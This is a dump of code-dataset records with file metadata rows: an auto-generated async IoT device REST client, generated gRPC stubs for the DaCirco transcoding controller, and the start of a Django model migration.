:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.enable_c2d_messages.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
enable_c2d_messages.metadata = {'url': '/device/{connectionId}/enableC2dMessages'}
async def send_event(
self, connection_id, event_body, *, custom_headers=None, raw=False, **operation_config):
"""Send an event.
:param connection_id: Id for the connection
:type connection_id: str
:param event_body:
:type event_body: ~e2erestapi.models.EventBody
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.send_event.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(event_body, 'EventBody')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
send_event.metadata = {'url': '/device/{connectionId}/event'}
async def wait_for_c2d_message(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Wait for a c2d message.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: EventBody or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.EventBody or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.wait_for_c2d_message.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EventBody', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
wait_for_c2d_message.metadata = {'url': '/device/{connectionId}/c2dMessage'}
async def enable_twin(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Enable device twins.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.enable_twin.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
enable_twin.metadata = {'url': '/device/{connectionId}/enableTwin'}
async def get_twin(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Get the device twin.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Twin or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.Twin or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.get_twin.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Twin', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_twin.metadata = {'url': '/device/{connectionId}/twin'}
async def patch_twin(
self, connection_id, twin, *, custom_headers=None, raw=False, **operation_config):
"""Updates the device twin.
:param connection_id: Id for the connection
:type connection_id: str
:param twin:
:type twin: ~e2erestapi.models.Twin
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.patch_twin.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(twin, 'Twin')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
patch_twin.metadata = {'url': '/device/{connectionId}/twin'}
async def wait_for_desired_properties_patch(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Wait for the next desired property patch.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Twin or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.Twin or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.wait_for_desired_properties_patch.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Twin', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
wait_for_desired_properties_patch.metadata = {'url': '/device/{connectionId}/twinDesiredPropPatch'}
async def get_connection_status(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""get the current connection status.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: str or ClientRawResponse if raw=true
:rtype: str or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.get_connection_status.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('str', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_connection_status.metadata = {'url': '/device/{connectionId}/connectionStatus'}
async def wait_for_connection_status_change(
self, connection_id, connection_status, *, custom_headers=None, raw=False, **operation_config):
"""wait for the current connection status to change and return the changed
status.
:param connection_id: Id for the connection
:type connection_id: str
:param connection_status: Desired connection status. Possible values
include: 'connected', 'disconnected'
:type connection_status: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: str or ClientRawResponse if raw=true
:rtype: str or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.wait_for_connection_status_change.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['connectionStatus'] = self._serialize.query("connection_status", connection_status, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('str', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
wait_for_connection_status_change.metadata = {'url': '/device/{connectionId}/connectionStatusChange'}
async def get_storage_info_for_blob(
self, connection_id, blob_name, *, custom_headers=None, raw=False, **operation_config):
"""Get storage info for uploading into blob storage.
:param connection_id: Id for the connection
:type connection_id: str
:param blob_name: name of blob for blob upload
:type blob_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: BlobStorageInfo or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.BlobStorageInfo or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.get_storage_info_for_blob.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['blobName'] = self._serialize.query("blob_name", blob_name, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('BlobStorageInfo', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_storage_info_for_blob.metadata = {'url': '/device/{connectionId}/storageInfoForBlob'}
async def notify_blob_upload_status(
self, connection_id, correlation_id, is_success, status_code, status_description, *, custom_headers=None, raw=False, **operation_config):
"""notify iothub about blob upload status.
:param connection_id: Id for the connection
:type connection_id: str
:param correlation_id: correlation id for blob upload
:type correlation_id: str
:param is_success: True if blob upload was successful
:type is_success: bool
:param status_code: status code for blob upload
:type status_code: str
        :param status_description: human-readable description of the status for
blob upload
:type status_description: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.notify_blob_upload_status.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['correlationId'] = self._serialize.query("correlation_id", correlation_id, 'str')
query_parameters['isSuccess'] = self._serialize.query("is_success", is_success, 'bool')
query_parameters['statusCode'] = self._serialize.query("status_code", status_code, 'str')
query_parameters['statusDescription'] = self._serialize.query("status_description", status_description, 'str')
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
notify_blob_upload_status.metadata = {'url': '/device/{connectionId}/blobUploadStatus'}
| 41.891681 | 149 | 0.666777 | 5,037 | 48,343 | 6.196546 | 0.052214 | 0.034602 | 0.028194 | 0.031014 | 0.854479 | 0.843329 | 0.837306 | 0.82715 | 0.81584 | 0.81584 | 0 | 0.006235 | 0.246861 | 48,343 | 1,153 | 150 | 41.928014 | 0.851026 | 0.051962 | 0 | 0.74902 | 1 | 0 | 0.090058 | 0.029616 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001961 | false | 0.005882 | 0.005882 | 0 | 0.07451 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6f69d77b76a5edd33e6caaa64fb8f65519eff84c | 14,677 | py | Python | src/dacirco/proto/dacirco_pb2_grpc.py | albertoblanc/dacirco | 965a2e4ad49ec7754eb42442a570bf6d1bf00e89 | [
"MIT"
] | null | null | null | src/dacirco/proto/dacirco_pb2_grpc.py | albertoblanc/dacirco | 965a2e4ad49ec7754eb42442a570bf6d1bf00e89 | [
"MIT"
] | null | null | null | src/dacirco/proto/dacirco_pb2_grpc.py | albertoblanc/dacirco | 965a2e4ad49ec7754eb42442a570bf6d1bf00e89 | [
"MIT"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from dacirco.proto import dacirco_pb2 as dacirco_dot_proto_dot_dacirco__pb2
class DaCircogRPCServiceStub(object):
"""*
The gRPC interface of the DaCirco controller
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.submit_request = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/submit_request',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequest.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequestReply.FromString,
)
self.get_requests = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/get_requests',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.Empty.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.RequesIDList.FromString,
)
self.get_request = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/get_request',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.RequestID.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequest.FromString,
)
self.get_request_status = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/get_request_status',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.RequestID.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequestStatus.FromString,
)
self.register_worker = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/register_worker',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.FromString,
)
self.get_tasks = channel.unary_stream(
'/dacirco_grpc_service.DaCircogRPCService/get_tasks',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.TCTask.FromString,
)
self.submit_event = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/submit_event',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.GrpcEvent.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.FromString,
)
self.submit_error = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/submit_error',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.GrpcErrorEvent.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.FromString,
)
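# A minimal client-side sketch (hypothetical address; channel lifecycle
# management elided). Note that get_tasks is a server-streaming call, so the
# stub returns an iterator of TCTask messages:
#
#   channel = grpc.insecure_channel("localhost:50051")
#   stub = DaCircogRPCServiceStub(channel)
#   worker = dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc()
#   for task in stub.get_tasks(worker):
#       print(task)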
class DaCircogRPCServiceServicer(object):
"""*
The gRPC interface of the DaCirco controller
"""
def submit_request(self, request, context):
"""/ The REST frontend calls this method when it recevies a new request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def get_requests(self, request, context):
"""/ The REST frontend calls this method to answer a GET /jobs request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def get_request(self, request, context):
"""/ The REST frontend calls this method to answer a GET /jobs/job_id request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def get_request_status(self, request, context):
"""/ The REST frontend calls this method to answer a GET /jobs/job_id/stae request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def register_worker(self, request, context):
"""/ Each transcoding worker calls this method whenever it *first* starts
(i.e., one call only from each worker).
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def get_tasks(self, request, context):
"""/ Transconding workers call this method to get their tasks.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def submit_event(self, request, context):
"""/ Transconding workers call this method to inform the controller about a (non-error) event.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def submit_error(self, request, context):
"""/ Transconding workers call this method to inform the controller about a (non-error) event.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_DaCircogRPCServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'submit_request': grpc.unary_unary_rpc_method_handler(
servicer.submit_request,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequest.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequestReply.SerializeToString,
),
'get_requests': grpc.unary_unary_rpc_method_handler(
servicer.get_requests,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.Empty.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.RequesIDList.SerializeToString,
),
'get_request': grpc.unary_unary_rpc_method_handler(
servicer.get_request,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.RequestID.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequest.SerializeToString,
),
'get_request_status': grpc.unary_unary_rpc_method_handler(
servicer.get_request_status,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.RequestID.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequestStatus.SerializeToString,
),
'register_worker': grpc.unary_unary_rpc_method_handler(
servicer.register_worker,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.SerializeToString,
),
'get_tasks': grpc.unary_stream_rpc_method_handler(
servicer.get_tasks,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.TCTask.SerializeToString,
),
'submit_event': grpc.unary_unary_rpc_method_handler(
servicer.submit_event,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.GrpcEvent.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.SerializeToString,
),
'submit_error': grpc.unary_unary_rpc_method_handler(
servicer.submit_error,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.GrpcErrorEvent.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'dacirco_grpc_service.DaCircogRPCService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class DaCircogRPCService(object):
"""*
The gRPC interface of the DaCirco controller
"""
@staticmethod
def submit_request(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/submit_request',
dacirco_dot_proto_dot_dacirco__pb2.TCRequest.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.TCRequestReply.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def get_requests(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/get_requests',
dacirco_dot_proto_dot_dacirco__pb2.Empty.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.RequesIDList.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def get_request(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/get_request',
dacirco_dot_proto_dot_dacirco__pb2.RequestID.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.TCRequest.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def get_request_status(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/get_request_status',
dacirco_dot_proto_dot_dacirco__pb2.RequestID.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.TCRequestStatus.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def register_worker(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/register_worker',
dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def get_tasks(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/dacirco_grpc_service.DaCircogRPCService/get_tasks',
dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.TCTask.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def submit_event(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/submit_event',
dacirco_dot_proto_dot_dacirco__pb2.GrpcEvent.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def submit_error(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/submit_error',
dacirco_dot_proto_dot_dacirco__pb2.GrpcErrorEvent.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 46.891374 | 124 | 0.677386 | 1,445 | 14,677 | 6.483737 | 0.093426 | 0.053367 | 0.07845 | 0.09414 | 0.880991 | 0.878109 | 0.863059 | 0.837763 | 0.713523 | 0.63027 | 0 | 0.004568 | 0.254275 | 14,677 | 312 | 125 | 47.041667 | 0.851439 | 0.073925 | 0 | 0.59127 | 1 | 0 | 0.101962 | 0.066959 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.007937 | 0.031746 | 0.123016 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
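
A minimal client-side sketch for the DaCirco service above, included for orientation; it is not part of the repository. It assumes a controller reachable at localhost:50051 (a placeholder address) and leaves all request message fields at their defaults.

import grpc
from dacirco.proto import dacirco_pb2, dacirco_pb2_grpc

def example_client():
    # Open a plaintext channel to a (hypothetical) local controller.
    with grpc.insecure_channel('localhost:50051') as channel:
        stub = dacirco_pb2_grpc.DaCircogRPCServiceStub(channel)
        # Unary call: submit a transcoding request (fields left empty here).
        reply = stub.submit_request(dacirco_pb2.TCRequest())
        # Server-streaming call: a worker iterates over the tasks it is sent.
        for task in stub.get_tasks(dacirco_pb2.WorkerDesc()):
            print(task)
        return reply
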
5b0b600e8a1e85dba1c5854a4d0a33157de33a29 | 15,297 | py | Python | configuration/migrations/0001_initial.py | Parveen3300/Reans | 6dfce046b01099284a8c945a04600ed83e5099a4 | [
"Apache-2.0"
] | null | null | null | configuration/migrations/0001_initial.py | Parveen3300/Reans | 6dfce046b01099284a8c945a04600ed83e5099a4 | [
"Apache-2.0"
] | null | null | null | configuration/migrations/0001_initial.py | Parveen3300/Reans | 6dfce046b01099284a8c945a04600ed83e5099a4 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.2.8 on 2021-11-15 05:11
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UnitOfMeasurement',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('unit_measurement', models.CharField(max_length=30, unique=True)),
('short_form', models.CharField(max_length=10)),
('description', models.CharField(blank=True, max_length=200, null=True)),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_unitofmeasurements', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
